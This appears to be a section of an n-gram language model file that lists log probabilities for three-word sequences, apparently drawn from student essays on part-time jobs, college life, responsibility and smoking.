-2.0677173 how to serve
-1.8195249 can also serve
-1.4969108 will only serve
-1.5567433 to go serve
-0.9653139 restaurant or clean
-0.95346725 clean some dishes
-0.54174346 are washing dishes
-0.96873605 but that pales
-0.943531 with learning international
-0.9977236 against the law
-0.9708606 medicine , law
-2.0306695 such as law
-0.5415809 learning international law
-0.9652262 law or advanced
-0.939651 right about advanced
-0.70563835 or advanced mechanical
-2.700372 <s> I focused
-2.4066699 should be focused
-2.0149891 student is focused
-0.96979755 concentrated and focused
-0.7771444 is heavily focused
-2.397405 , I truly
-0.96934706 profession is truly
-2.4837198 able to truly
-1.2084849 several reasons why
-0.7522385 many reasons why
-1.0312898 of reasons why
-1.1274343 two reasons why
-1.637866 this is why
-1.2324202 That is why
-0.95132303 cwhich is why
-1.200659 only reason why
-0.9533981 smoking so why
-0.877244 really see why
-0.9538444 first be made
-1.7025523 could be made
-1.2592678 have not made
-1.22635 one has made
-0.9575156 , also made
-1.4300328 They have made
-1.180395 the effort made
-0.92435646 it was made
-0.95854473 made more affordable
-1.8875811 who are smart
-0.9653139 working or gifted
-0.9657898 full and proper
-0.9657898 meet and proper
-1.8489242 to get proper
-1.88799 , to reduce
-0.96748304 colleges to reduce
-0.9509391 may help reduce
-0.9482944 , could reduce
-0.8634614 -RRB- loans reduce
-0.70521736 would significantly reduce
-1.4847552 because I firmly
-1.3922634 why I firmly
-2.4202912 should be encouraged
-1.2691407 hard and reach
-1.8378661 as they reach
-1.6497928 when we reach
-0.938292 time doing meaningless
-0.9710908 meaningless , unchallenging
-0.97038597 unchallenging and pointless
-1.5602461 opportunity for anyone
-2.2226095 believe that anyone
-0.9582222 upon by anyone
-1.853765 time in anyone
-1.2370737 not so fortunate
-1.6328001 I was fortunate
-0.8184666 for anyone fortunate
-2.0652468 student to attend
-1.6886886 able to attend
-1.5629126 good for everyone
-1.1433476 <s> Not everyone
-1.851487 their time wisely
-0.95155805 using time wisely
-2.1841552 they have wisely
-0.9580905 money more wisely
-1.3702371 and spend wisely
-1.2691407 degree and moving
-0.9304497 aren ft moving
-0.90961 can before moving
-0.9709195 choice to refrain
-2.2863927 students should refrain
-1.1785548 expanding your circle
-0.54174346 a vicious circle
-2.1590135 college student knows
-0.54174346 <s> Everyone knows
-0.94724613 their most precious
-0.9513582 during these precious
-0.70563835 most precious commodity
-0.96005386 Consider an average
-0.95838577 time by 20
-1.810164 , working 20
-1.7359891 number of hours
-0.9611777 excessive working hours
-1.23595 during school hours
-1.3467282 not enough hours
-0.21872002 <s> 20 hours
-0.21872002 by 20 hours
-0.21872002 working 20 hours
-0.5410506 's 25 hours
-0.7760148 a few hours
-0.8762872 have long hours
-0.77638435 or 40 hours
-0.5410506 play 24 hours
-1.5696235 hours , 5
-0.96308905 my student days
-0.9597576 their college days
-1.1794721 fs college days
-0.44393384 my college days
-0.4182338 students these days
-0.82500273 like these days
-0.82500273 costs these days
-0.86294854 2 free days
-1.515921 on my days
-0.7048308 , 5 days
-1.1412889 <s> Those days
-0.7048308 to five days
-0.9507646 more a week
-0.45052022 hours a week
-0.9507646 days a week
-0.9507646 nights a week
-0.95623523 day study week
-0.21932037 hours per week
-0.34232748 lost per week
-0.5415809 a 5-day week
-2.6843307 , and ready
-0.84262145 <s> Getting ready
-1.955224 work and driving
-0.9459181 result can easily
-0.9459181 back can easily
-1.2273366 This could easily
-0.8776273 that quit easily
-0.9221157 an extra hour
-0.94633484 into after hour
-0.9603899 <s> Every hour
-0.5415809 every waking hour
-0.96889466 applications for each
-0.8186068 extra hour each
-1.6089951 in this day
-0.96731174 lunch that day
-1.8614057 working a day
-2.407579 in the day
-2.5837984 of the day
-0.9522205 college one day
-1.490511 the following day
-0.9577573 standing all day
-0.8620951 single free day
-0.8433006 me every day
-0.70418733 hour each day
-0.77592903 individual whose day
-0.54078573 <s> Their day
-0.54078573 a 6 day
-1.2130678 That 's 25
-1.6469564 study time lost
-0.54174346 productivity causing lost
-1.0499727 20 hours per
-0.9710284 few hours per
-0.7055833 time lost per
-2.5041761 to the risk
-0.9672942 running the risk
-0.9615076 most at risk
-1.1784706 a high risk
-1.6415124 job will cause
-1.474545 job may cause
-0.919685 This may cause
-2.0572884 would be added
-2.2101698 , the added
-1.4673352 and the added
-0.9566298 gain the added
-0.9566298 without the added
-0.97025436 feelings of frustration
-1.2880919 the added frustration
-0.8426969 <s> Maintaining friendly
-1.2598004 relationships with coworkers
-0.970309 boss and coworkers
-0.96952754 coworkers is bound
-2.0020587 may be tempting
-2.4202912 should be urged
-0.9477062 employment as soon
-1.2255371 jobs as soon
-1.4927332 work force soon
-0.9221495 that right soon
-1.1785105 reasons : First
-1.2695354 being a dependent
-0.8969924 are fully dependent
-0.70563835 a dependent child
-0.96952754 adult is rapidly
-0.5417812 is rapidly underway
-2.0192907 students have moved
-0.96928775 purchase a home
-1.4413908 outside the home
-1.7542026 away from home
-0.8624685 they leave home
-1.1253586 or at home
-0.8920071 staying at home
-0.8920071 live at home
-1.650821 they get home
-0.77638435 of staying home
-1.3181838 the family home
-0.9249859 or going home
-0.84399164 run back home
-1.2175702 for having responsibility
-2.25803 with the responsibility
-2.402901 , the responsibility
-0.97004807 discipline , responsibility
-0.9640375 value and responsibility
-1.5424502 discipline and responsibility
-1.6151173 understanding of responsibility
-1.5981817 sense of responsibility
-1.4040796 terms of responsibility
-1.20399 and financial responsibility
-2.1830285 , or responsibility
-1.3422443 to take responsibility
-0.84213525 must take responsibility
-0.9453825 our social responsibility
-1.0462049 it teaches responsibility
-1.0453346 is certainly responsibility
-0.70431596 freedom comes responsibility
-1.2709996 lives , ranging
-2.103848 going to bed
-0.9672094 To be sure
-0.87772065 to making sure
-1.7999148 to make sure
-0.9687079 sure their homework
-0.852821 , doing homework
-0.65699667 from doing homework
-0.65699667 or doing homework
-0.65699667 spent doing homework
-0.9694666 homework is completed
-0.8186068 not properly completed
-1.197968 of university dormitories
-0.9448233 , preparing breakfast
-0.9709622 breakfast , lunch
-0.9615076 it at lunch
-1.1439165 to eat lunch
-0.97038597 lunch and dinner
-2.0682049 , they never-the-less
-0.9650865 he can build
-0.96305114 one to build
-1.4224052 necessary to build
-1.5387259 trying to build
-0.96005386 build an identity
-0.96559507 responsibilities I fve
-0.9480385 until you fve
-1.2606536 were not mentioned
-0.7054753 I fve mentioned
-0.8184666 reasons above mentioned
-2.712588 <s> I admit
-1.4073776 this may seem
-0.9596274 They all seem
-0.9709693 lot to handle
-1.786465 for a person
-1.8806763 , a person
-1.8957257 in a person
-0.92811286 chance a person
-0.92811286 developing a person
-0.92811286 assets a person
-0.92811286 affect a person
-0.97047156 person to person
-0.962452 vary from person
-1.6528003 a better person
-1.5462832 a young person
-0.9438248 well rounded person
-0.86400133 their late teens
-0.9656202 getting it early
-0.92719316 from an early
-1.3262391 at an early
-0.964643 teens or early
-0.8634614 people especially early
-0.9429879 burn out early
-0.8453224 or early twenties
-1.5250006 understand that adding
-1.7817816 think that adding
-1.4629169 <s> By adding
-1.2492541 provide an unnecessary
-1.2704892 but the contrary
-2.6336813 to the aforementioned
-1.2452129 are my list
-0.54174346 the aforementioned list
-0.9703093 benefit of remuneration
-0.9146115 the personal satisfaction
-1.2675868 student in gaining
-0.97014666 satisfaction of gaining
-2.3839705 they are gaining
-2.4883869 , and independence
-1.2591404 confidence and independence
-1.858969 amount of independence
-0.97047156 dependence to independence
-0.90427047 of financial independence
-0.7496675 gaining financial independence
-0.7496675 brings financial independence
-0.94022846 assert his independence
-0.54140407 of fiscal independence
-1.657614 life is enormous
-1.9542363 is an enormous
-1.2883024 the added self-esteem
-0.9650865 self-esteem can manifest
-1.0481644 will likely manifest
-0.96952105 itself in improved
-1.8027575 and a growing
-1.565553 way of growing
-1.6317763 I was growing
-0.5415809 Many youngsters growing
-1.6614695 sense of securing
-0.9709195 key to securing
-2.0021756 However , dating
-0.8970996 it makes dating
-0.970309 faster and easier
-1.1014801 a much easier
-0.8778956 dating much easier
-1.4517479 have to ask
-0.95792127 Let fs ask
-0.97025436 point of view
-2.0372965 <s> They view
-2.5275056 is a big
-0.9569647 Australia many big
-0.95380145 as one big
-0.7775762 one big party
-0.7055833 a third party
-0.9707589 out , drinking
-0.96979755 partying and drinking
-1.2166344 go out drinking
-0.9377964 meetings where drinking
-0.5414925 of binge drinking
-1.2462791 college by joining
-0.970309 drinking and joining
-2.7886145 of the clubs
-1.2671331 participation in clubs
-0.94670403 joining social clubs
-0.70521736 by joining clubs
-1.3841803 <s> All clubs
-2.3892295 they are washing
-1.4321926 studying can create
-1.3551531 <s> In Australia
-0.96546304 Australia I studied
-0.9252456 subject being studied
-1.6422194 may have studied
-2.1266 at the University
-0.9691483 knew in University
-2.4359963 of their University
-0.5414925 of Northeastern University
-0.9703093 University of Technology
-0.5417812 of Technology Sydney
-0.90978175 There were 8,000
-0.54174346 <s> 75 %
-0.54174346 concentrate 100 %
-0.96559507 students I knew
-1.7314224 because they knew
-0.95956486 lost for companies
-1.2483029 essential for companies
-0.95619273 with many companies
-0.96892005 only in companies
-0.87702936 to change companies
-0.7768402 many big companies
-0.8444742 and public companies
-0.5413157 credit card companies
-0.8885696 big companies hire
-2.0374699 order to test
-0.9446826 the perfect test
-1.8977814 for their character
-0.95969945 out their character
-1.9648479 be a positive
-2.2585597 is a positive
-2.0749695 as a positive
-1.7514336 is very positive
-1.710038 the same thing
-1.0927433 a positive thing
-1.2461146 at this point
-0.96956015 offer a point
-2.5941486 to the point
-1.2422879 Another important point
-1.6025639 , what point
-0.6088574 This final point
-0.6088574 My final point
-1.3627045 <s> My point
-0.54122734 , grade point
-2.1505525 <s> This indirectly
-1.5502775 makes it cheaper
-0.9655893 cheaper on taxpayers
-2.0678182 <s> In summary
-0.9694723 So in summary
-0.96829027 positive for both
-0.9687765 bounty is both
-1.806714 life , both
-1.2633739 regard to both
-1.8370996 learn to both
-1.1444503 for success both
-0.9087888 daily lives both
-0.5413157 to juggle both
-2.3522997 for the economy
-2.1579654 and the economy
-0.9621749 reviving the economy
-1.1010312 the local economy
-0.7774487 the general economy
-0.9329424 at how easy
-0.93073195 all too easy
-0.9709693 easy to hide
-2.3999302 able to stay
-1.8412709 difficult to stay
-1.6849324 help them stay
-0.7776412 them stay attached
-1.5671173 provide a backdrop
-1.566702 knowledge of lots
-0.9703093 lots of bare
-0.5417812 of bare facts
-2.4325557 the student obtain
-1.8510447 having to obtain
-1.518836 unable to obtain
-2.0623796 have to obtain
-0.9851498 opportunity to obtain
-1.4366505 which they obtain
-2.2551448 can be converted
-1.5664853 level of wisdom
-0.54174346 newly coined wisdom
-2.548219 in the broader
-1.6838901 in some departments
-1.5867296 to focus strictly
-2.3519025 it is common
-1.9946704 It is common
-1.233163 situation is common
-0.9480326 not very common
-1.4437836 students a break
-0.7055833 a summer break
-2.1251013 their studies --
-1.5047146 do so --
-1.0780898 smoking entirely --
-1.2663965 let their subconscious
-0.5417812 their subconscious processes
-2.3714485 on the information
-0.96412337 schedules with class
-0.9691516 forgo a class
-1.6691142 a full-time class
-1.23075 learned in class
-1.23075 get in class
-0.9504479 actually in class
-1.2962822 going to class
-1.3921611 of my class
-1.3921611 on my class
-0.8868732 split between class
-0.5409623 from pure class
-0.9328868 fulfill our class
-0.5409623 as swimming class
-0.70444465 to miss class
-0.96997774 energy and concentration
-0.96840984 lose their concentration
-1.7840121 They are concentration
-0.95110464 usually help concentration
-1.5423028 <s> Such connections
-0.9472409 with social connections
-0.9671011 connections they ca
-0.54174346 <s> Customers ca
-1.2552633 get from pure
-1.955224 work and association
-1.7395061 students and faculty
-0.9650865 connections can enrich
-0.7055833 also greatly enrich
-1.3615991 of those whose
-1.0254587 to those whose
-0.9145365 The individual whose
-0.9652454 career will ultimately
-1.246715 degree and ultimately
-0.9587474 ability and ultimately
-0.9587474 tournament and ultimately
-1.2445872 or may ultimately
-0.8453008 will ultimately remain
-2.333326 of a company
-0.95380145 with one company
-0.89687794 with bad company
-1.5671173 provide a network
-1.554918 In the end
-1.7512143 in the end
-0.9683048 these students end
-1.702165 those who end
-1.2232125 end up needing
-1.2618173 a work record
-0.970309 record and references
-1.4988186 be good references
-2.1864247 with the individual
-1.5330077 to the individual
-0.9615649 assist the individual
-0.96792346 building their individual
-2.2966485 <s> The individual
-0.88135886 of an individual
-0.88135886 on an individual
-0.88135886 growth an individual
-1.1180985 a responsible individual
-0.8443649 Japan every individual
-0.5413157 academically minded individual
-2.1380718 related to coursework
-1.5898334 student 's coursework
-1.2693326 thousands of applications
-0.84522486 see practical applications
-0.9584591 provides more background
-0.54174346 <s> Practical background
-1.4452091 understanding the principles
-0.9582684 discover that he
-0.9582684 assume that he
-1.2584276 of job he
-1.7381186 however , he
-1.6337612 or not he
-1.2662791 -RRB- and he
-2.020437 , as he
-0.9559923 managerial skills he
-2.0443344 <s> If he
-0.90831107 year before he
-1.2504097 , since he
-0.5409623 the principles he
-2.2904634 job , she
-0.32267326 he or she
-2.0627904 <s> If she
-2.6336813 to the specific
-0.86392206 student eventually wants
-0.7055833 and definitely wants
-1.2705404 independent , mature
-1.2702302 people to mature
-1.7899624 help students mature
-1.647141 we are mature
-0.94460577 mature into functioning
-0.8635808 become productive members
-0.95930976 when all members
-0.88812464 functioning adult members
-0.5415809 <s> Family members
-2.341476 , it instils
-2.7495873 part-time job instils
-2.059538 from the discipline
-2.4179401 the student discipline
-0.9694374 dedication and discipline
-1.6584225 sense of discipline
-1.2058519 of financial discipline
-0.70495963 job instils discipline
-0.7768402 exercised greater discipline
-2.4946728 students to fulfill
-2.0801775 time to fulfill
-1.2552027 required to fulfill
-2.5041761 to the expectations
-0.9672942 fulfill the expectations
-1.3400137 have no expectations
-0.54166937 has realistic expectations
-1.8046691 job and abide
-1.9593399 by the rules
-1.269442 job of filing
-0.5417812 of filing correspondence
-0.81513387 , being organized
-1.1360445 of being organized
-0.97038597 organized and attentive
-0.9709693 attentive to details
-1.4448218 come to realize
-1.683593 help them realize
-1.7691783 in Japan realize
-0.4325418 helps us realize
-1.7781714 dealing with co-workers
-1.438136 realize that co-workers
-2.0077977 with their co-workers
-1.5186512 of my co-workers
-1.803115 job and rely
-2.709341 college students rely
-0.8184666 that co-workers rely
-2.3714485 on the efficient
-1.2597992 this will motivate
-2.2938926 to be diligent
-2.0181718 student is diligent
-2.125482 are not diligent
-1.4138292 at an earlier
-1.5607967 them in age
-0.9692575 day and age
-1.5635303 variety of age
-1.7957847 of college age
-0.94806415 reach college age
-1.5453995 a young age
-0.42364976 an early age
-0.54122734 an earlier age
-0.54122734 the correct age
-2.7515192 part-time job broadens
-1.2654953 studies that interest
-1.2686062 loss of interest
-0.95789003 having more interest
-0.5414925 job broadens interest
-0.5414925 to losing interest
-0.97038597 interest and opens
-1.018674 a wider array
-0.9658522 against job possibilities
-0.93039894 of career possibilities
-0.9509998 explore these possibilities
-0.5415809 with diminished possibilities
-2.1320326 students , yet
-1.566105 skills and yet
-1.6422194 who have yet
-0.9703562 yet a clear
-1.1193492 be made clear
-2.4288554 the student determine
-2.099244 student to determine
-1.2320031 could help determine
-0.77729654 and sometimes determine
-0.97010547 devised a kind
-0.9531605 find some kind
-0.96729845 classmates are kind
-1.3545477 and what kind
-0.90602463 determine what kind
-0.91465205 job he likes
-0.9653139 likes or dislikes
-0.95028013 and which managerial
-1.2693326 issue of finance
-0.9444466 on -LRB- finance
-0.97014666 causes of human
-0.96546555 nature as human
-0.9650539 finance or human
-1.7371128 time and resources
-1.2006366 and other resources
-0.77729654 or human resources
-0.77729654 of economic resources
-1.2375263 student who interns
-1.4138292 at an advertising
-0.5417812 an advertising agency
-0.9708217 surprised to discover
-0.9576497 agency may discover
-1.2273366 study could discover
-0.96005386 has an aptitude
-0.96894807 aptitude for graphic
-0.5417812 for graphic design
-0.9653139 design or copywriting
-1.5426197 <s> Such hands-on
-1.2696514 provides a richer
-1.2947836 an individual basis
-0.54166937 a richer basis
-0.54166937 a temporary basis
-0.96879 basis for planning
-0.9593317 as experience planning
-0.9380174 , financial planning
-0.94108486 career than waiting
-0.96841514 work for around
-1.5255615 the people around
-0.84480584 and focused around
-0.54140407 than waiting around
-0.8446352 I look around
-0.81796503 many places around
-2.5689857 for the rigors
-0.97038597 rigors and dynamics
-0.9709622 personality , confidence
-1.3281894 with little confidence
-1.3049376 and gain confidence
-1.3353155 are too ggreen
-0.9469099 greal world h
-0.5415809 too ggreen h
-0.5415809 gGreat Works h
-1.2597992 experience will familiarize
-0.9599652 example an office
-0.9329424 of how office
-0.970158 levels and hierarchies
-0.9470824 inherent social hierarchies
-0.7054753 how office hierarchies
-2.0152106 they can situate
-2.2413182 as a newcomer
-0.96889466 to for guidance
-0.7055833 in providing guidance
-1.2695947 guidance and mentoring
-0.9710908 homework , writing
-0.5417812 , writing essays
-0.970309 essays and reports
-1.3566514 have been reports
-2.3699582 on the side
-0.8777878 for either side
-0.9559639 student would normally
-2.1185288 to be taken
-1.925961 would be taken
-1.7852325 that are taken
-1.1190692 is best taken
-0.96920437 training is needed
-1.9238652 the time needed
-0.94507897 provide much needed
-0.7773812 in obtaining needed
-1.9037992 , in turn
-0.8186068 could easily turn
-1.566702 lack of sleep
-0.96228844 activities is essential
-1.8443623 which is essential
-1.7616539 is an essential
-1.1881351 , an essential
-0.54166937 of sleep essential
-0.9653765 same job later
-0.9617469 useful in later
-0.9617469 society in later
-1.9414414 to study later
-0.9642324 sooner or later
-1.1924024 successful career later
-1.0621269 they need later
-0.8539518 would need later
-0.5413157 related illness later
-1.2577498 we can actually
-0.9646301 he will actually
-1.2680948 requirements of actually
-2.6473858 students to actually
-1.8311868 spend time actually
-1.8875722 they should actually
-1.7172816 money they actually
-1.2643 college are career-oriented
-0.96857595 seemed that choosing
-1.4408765 helpful in choosing
-1.4623752 <s> By choosing
-0.96644884 clubs have secretary
-1.7386603 become a manager
-0.97063816 Taking the manager
-0.9709622 secretary , manager
-2.2403214 as a treasurer
-2.6843307 , and treasurer
-1.2636962 , for instance
-2.1748796 if they plan
-1.5671173 or a branch
-0.970158 spend and budget
-1.8642823 learn to budget
-0.9577386 club fs budget
-2.4123354 <s> I fd
-1.5618979 as I fd
-0.95859265 conclude by saying
-1.4847877 their lives inside
-2.4149652 should be concentrating
-0.96587366 By not concentrating
-1.2691407 clubs and concentrating
-0.95958614 consider this fact
-1.5522907 with the fact
-2.6481862 of the fact
-0.95348483 the one hand
-0.86297345 experience first hand
-0.86297345 gain first hand
-0.21446338 the other hand
-0.8774103 a second hand
-0.5414925 , kitchen hand
-2.0009396 lead to loss
-0.7775762 smoke causes loss
-0.93486565 in other genuine
-2.4184859 should be engaging
-0.9710474 depth , engaging
-1.6521212 learning to play
-0.9678614 access to play
-0.96005386 play an instrument
-0.9710908 instrument , sports
-1.6390226 job will simply
-1.9701433 , or simply
-0.9460886 sports or simply
-2.212325 There are simply
-0.8445425 be developed simply
-1.4003961 that would simply
-0.84194326 and well-being simply
-0.9710474 wanted , hang
-1.1012999 or simply hang
-1.7784469 a good friend
-1.2595543 up with developing
-0.970158 friend and developing
-1.2597747 spent on developing
-1.2704892 also the danger
-0.9703093 danger of ending
-1.9554842 with a materialistic
-0.5417812 a materialistic inclined
-1.4295079 and with diminished
-0.9703093 possibilities of understating
-0.96308273 restaurants with our
-0.9643498 \ be our
-0.9694397 these , our
-2.0374506 <s> In our
-1.8424957 time in our
-1.6536709 all of our
-0.9690737 attention to our
-0.9605465 lacking from our
-0.94567895 think on our
-1.2217014 Depending on our
-1.7237953 it fs our
-0.9377948 shall make our
-1.0436453 to improve our
-1.0143803 to fulfill our
-0.8609898 focused around our
-1.3762513 <s> All our
-0.54034454 of understating our
-0.8159641 since its our
-0.54034454 also shows our
-0.7776412 as human beings
-1.4330316 first time ...
-1.2159157 parents that we
-1.4663093 something that we
-0.942605 just that we
-0.9625333 what job we
-1.9659576 time , we
-1.4016117 Yes , we
-1.8116045 college , we
-0.9521309 Naturally , we
-0.9521309 Principally , we
-2.0058591 , as we
-0.93123025 the reason we
-0.92807525 most jobs we
-0.92807525 what jobs we
-1.8375211 in school we
-0.9051605 because if we
-0.9051605 customers if we
-1.2101916 jobs then we
-1.7392529 earn money we
-1.3854729 and so we
-1.1269675 from College we
-0.7399982 that when we
-1.0146394 , when we
-0.39226922 do when we
-0.7399982 distractions when we
-0.7399982 lives when we
-1.3966722 on what we
-2.0138113 <s> If we
-1.2597365 I believe we
-1.1566409 , where we
-0.85142356 colleagues where we
-0.9060474 and before we
-0.87342954 through until we
-0.84117985 enslavement system we
-1.8420888 I think we
-1.1394507 college age we
-0.8701487 <s> When we
-0.8597 then everything we
-0.5397277 friends whenever we
-2.1573694 to do sooner
-0.8438521 with this opinion
-2.3583171 to the opinion
-1.2527953 support the opinion
-1.7545108 against the opinion
-2.3051038 <s> The opinion
-0.9139306 my personal opinion
-0.8755835 for my opinion
-0.8211931 is my opinion
-0.68985003 , my opinion
-0.68985003 In my opinion
-0.9055667 in my opinion
-0.68985003 fs my opinion
-0.68985003 voice my opinion
-1.7436155 not to rush
-1.2641429 lives are concentrated
-0.84262145 <s> Without concentrated
-1.6724663 , by its
-1.2518394 is at its
-0.89666134 work since its
-0.8182994 to determine its
-1.2485409 done for us
-1.2485409 paid for us
-0.59801644 job helps us
-0.8445425 also show us
-1.1003087 , let us
-0.8445425 which allow us
-0.8632097 people around us
-0.9564057 full-time study causes
-1.4054912 the main causes
-1.2127519 breathing smoke causes
-0.7776412 of human unhappiness
-2.5689857 for the love
-2.5689857 for the sole
-1.9719723 for a few
-0.9164639 work a few
-0.9508951 making a few
-0.9508951 up a few
-0.9328343 Japan how few
-1.0478809 The last few
-1.3170122 a few bucks
-2.0385978 be a distraction
-0.9657569 creates a distraction
-0.7775762 an obvious distraction
-0.9693766 still in further
-2.5049999 , and further
-0.9656403 distraction and further
-0.77750957 be contributing further
-1.0065018 and further cloud
-2.8185043 of the tricky
-0.5417812 the tricky monetary
-0.5417812 tricky monetary enslavement
-1.7709677 parents and live
-1.7103466 home and live
-1.4444742 choose to live
-2.2821784 students should live
-0.9377899 could well live
-0.95339495 system we live
-1.257133 any student under
-0.86392206 we live under
-0.8186782 that short span
-0.8885845 span between childhood
-2.0379982 order to assure
-0.970158 financial and mental
-0.95829105 assure more mental
-1.9751439 student fs mental
-0.7776412 more mental stability
-0.95834273 him for his
-0.95834273 carrying for his
-1.7307425 time in his
-1.5012834 later in his
-1.3852684 interested in his
-2.5732524 , and his
-1.2413532 course of his
-1.6609588 outside of his
-0.95597637 efficacy of his
-0.9660948 entirely to his
-0.9660948 adjusting to his
-0.94580114 guarantee on his
-0.94580114 out on his
-0.9413197 way -LRB- his
-1.7422053 to pay his
-0.95359665 pains when his
-1.4843823 to support his
-0.84259254 and manage his
-1.0439264 and allow his
-1.0965645 to lose his
-0.54043275 to assert his
-0.54043275 of starting his
-0.54043275 cupidity corrupts his
-0.54043275 generally focuses his
-1.248779 better for her
-0.9598097 critical for her
-1.7416764 some of her
-0.9705882 consequences to her
-0.4536702 his or her
-1.1003903 even lose her
-0.8426969 <s> No deviation
-2.2278736 that it allowed
-1.4039512 should be allowed
-0.96748435 customers are allowed
-1.2677655 day is absolutely
-1.4532362 I am absolutely
-2.7515192 part-time job executed
-0.9444802 under any conditions
-1.4019995 the necessary conditions
-0.9650865 period can influence
-0.8452535 a negative influence
-2.6690228 it is sometimes
-0.9709622 third , sometimes
-0.970158 influence and sometimes
-0.9580144 someone fs fate
-1.2704892 change the destiny
-2.3561552 for the entire
-2.476312 of the entire
-0.96236783 negates the entire
-2.0564725 , for generations
-0.95792127 grandfather fs generations
-2.3173888 <s> The damage
-0.84262145 and consequently damage
-2.2551448 can be irreversible
-0.89710486 A bad qualified
-0.70563835 and productivity causing
-1.018674 the entire nation
-0.9328095 had no direct
-0.8452535 ; result direct
-0.8971298 from possible wastes
-1.5687809 during the production
-1.2314191 the reasons above
-2.2834737 with the above
-1.5679003 on the above
-0.54166937 reasons stated above
-2.3040445 and the institutions
-0.9596274 within all institutions
-0.94110245 it first priority
-2.3320854 on their agendas
-0.8426969 <s> No excuses
-1.3711581 for any delay
-1.566702 lack of action
-2.2551448 can be accepted
-1.6502354 and that right
-1.4414201 has a right
-1.8705802 the job right
-1.8427693 that the right
-1.9403173 on the right
-1.1076039 have the right
-1.3569758 make the right
-0.939197 find the right
-0.939197 attain the right
-0.939197 balance the right
-0.9692575 holy and right
-0.96776146 nonetheless their right
-0.95122325 for education right
-0.7766882 is truly right
-0.9674512 and be assured
-0.7776412 a perfect self-improvement
-2.5330536 is a worthwhile
-2.0981677 <s> It serves
-1.5472735 an important element
-1.388338 most important element
-1.5687809 during the preparatory
-1.8598219 at a stage
-1.7273047 an important stage
-0.5415809 the preparatory stage
-0.5415809 most curious stage
-0.96292967 cities from country
-0.95380145 perhaps one country
-0.54166937 health conscious country
-0.96952105 country in Asia
-0.5417812 in Asia whereby
-0.8778863 <s> feel obliged
-1.1341197 become financially self-supporting
-1.2701352 earn , save
-2.6527693 , and save
-1.5419656 work to save
-1.9566098 order to save
-2.043514 them to save
-1.717955 money they save
-0.8962238 most families save
-1.1180675 to both save
-0.97038597 save and augment
-2.2403214 as a whole
-2.1495302 <s> This whole
-1.5464252 for money among
-1.1336819 and independence among
-0.54166937 considerable resistance among
-1.2637146 let the youth
-1.2637146 among the youth
-2.3173888 <s> The youth
-2.025229 job in his\/her
-1.9981146 part of his\/her
-1.797103 to make his\/her
-1.1927737 , support his\/her
-0.8635832 could reduce his\/her
-2.3423157 , it promotes
-0.97038597 tasks and duties
-0.5417812 and duties assigned
-0.97076845 extol the virtues
-0.95723146 teach important virtues
-2.034237 such as hard-work
-0.96394736 hard-work , teamwork
-0.96394736 communication , teamwork
-0.96394736 groups , teamwork
-0.96516645 bonus with respect
-2.6689322 , and respect
-1.8633696 learn to respect
-0.5415809 the much-needed respect
-1.2667356 respect for authority
-1.8046691 parents and authorities
-2.314604 in their schools
-1.8578542 at a local
-2.4339757 in the local
-2.0888412 at the local
-0.9696175 schools and local
-2.00426 with their local
-1.2590523 or as local
-1.4168838 working at local
-0.8778697 and local governments
-1.6503577 must be proactive
-1.2694414 guidance and setting
-0.9555825 fact when setting
-1.5359151 up the appropriate
-0.9623027 selected the appropriate
-0.9623027 considering the appropriate
-1.2490816 , an appropriate
-1.609801 of this policy
-1.6607387 such a policy
-0.5481489 the appropriate policy
-0.9469466 restaurant smoking policy
-1.0482398 appropriate policy measures
-0.9710474 clicks , avoid
-0.9709195 measures to avoid
-0.95353854 avoid some pitfalls
-1.7264895 people , including
-1.2651393 countries , including
-1.5880744 living expenses including
-0.54166937 some pitfalls including
-0.8186782 pitfalls including exploitation
-0.97038597 exploitation and abuse
-2.133677 students , excessive
-2.6879861 , and absenteeism
-0.97038597 absenteeism and gross
-0.5417812 and gross negligence
-2.4458141 of their schooling
-0.93476766 from our schooling
-1.4059235 The main purposes
-0.54174346 for relaxation purposes
-1.1786687 to : i
-0.9473718 i -RRB- attain
-1.5951159 the right competency
-1.5667008 skills and attitude
-1.2662591 change their attitude
-2.296603 to be desired
-2.2828546 of their desired
-2.1671886 to their desired
-0.9447781 their desired expertise
-1.5704043 and , ii
-0.9473076 ii -RRB- finish
-1.5568607 after they finish
-0.96552175 also not lose
-1.555649 only to lose
-0.96748304 nothing to lose
-0.957354 She may lose
-1.3248731 or even lose
-0.8774092 perhaps even lose
-1.0774819 and eventually lose
-0.8777878 not lose sight
-0.8885056 lose complete sight
-1.2352358 the potential gains
-1.4446229 outside the four
-2.3120105 to their four
-0.9511949 In these four
-0.777672 the four corners
-2.6509278 of the classroom
-1.2638448 between the classroom
-0.54174346 Paul h. Thus
-2.0856242 be a balance
-2.0942926 that the balance
-1.8477062 having to balance
-1.9105492 order to balance
-1.7677734 learn to balance
-1.2437649 try to balance
-0.94023085 one must balance
-0.9463261 of social balance
-0.9576286 \/ life balance
-1.5908618 the right balance
-2.04247 is not necessarily
-1.7212825 are many points
-0.88858426 with three points
-2.814478 of the argument
-0.87785065 the second argument
-1.1395903 the end unless
-2.2427309 and the decision
-0.9674895 then the decision
-1.4452091 are the attainment
-1.5675402 development of organizational
-1.97698 student fs organizational
-1.7390541 students and socially
-0.84262145 to communicate socially
-1.2697871 between the current
-1.663687 available to current
-2.3089337 in their current
-2.309394 <s> The current
-1.6771647 students may consist
-2.0241 This is mainly
-0.54174346 may consist mainly
-1.9859949 job is fast
-0.97014666 mainly of fast
-0.77750957 ft moving fast
-0.9653139 food or manual
-1.7096956 students with invaluable
-0.95539755 effectively are invaluable
-1.40072 skills are invaluable
-0.9324878 would provide invaluable
-0.77729654 are gaining invaluable
-1.9779186 student fs targeted
-0.96629435 Balancing work schedules
-0.9650539 worries or schedules
-0.92224 with class schedules
-1.2695947 income and arranging
-0.970309 planning and effective
-1.197765 they provide effective
-1.6341007 students can assist
-1.7369179 that will assist
-0.94658256 money will assist
-2.6527693 , and assist
-2.473131 able to assist
-2.2016408 time jobs assist
-1.8885157 they should assist
-0.9691483 individual in becoming
-1.2684236 growth and becoming
-1.4423964 risk of becoming
-1.4444742 up to becoming
-0.7771444 is fast becoming
-2.797555 of the daily
-1.2598424 tuition and daily
-0.9654619 rent and daily
-1.5564498 in their daily
-1.5161794 to enjoy daily
-0.8885696 lives both presently
-1.2262268 order to prepare
-1.5569246 trying to prepare
-0.9514089 as help prepare
-1.7985142 them for car
-2.5939465 have a car
-1.2702949 they start post
-0.7055833 for car post
-0.90965796 post graduation careers
-2.1653402 in their careers
-0.9594985 entering their careers
-0.89685124 in professional careers
-2.061142 not be passed
-2.2536452 can be extremely
-0.9433873 workloads become extremely
-2.1214323 will be impressed
-0.96166855 impressed at interviews
-1.4454614 come to cities
-0.54174346 often multicultural cities
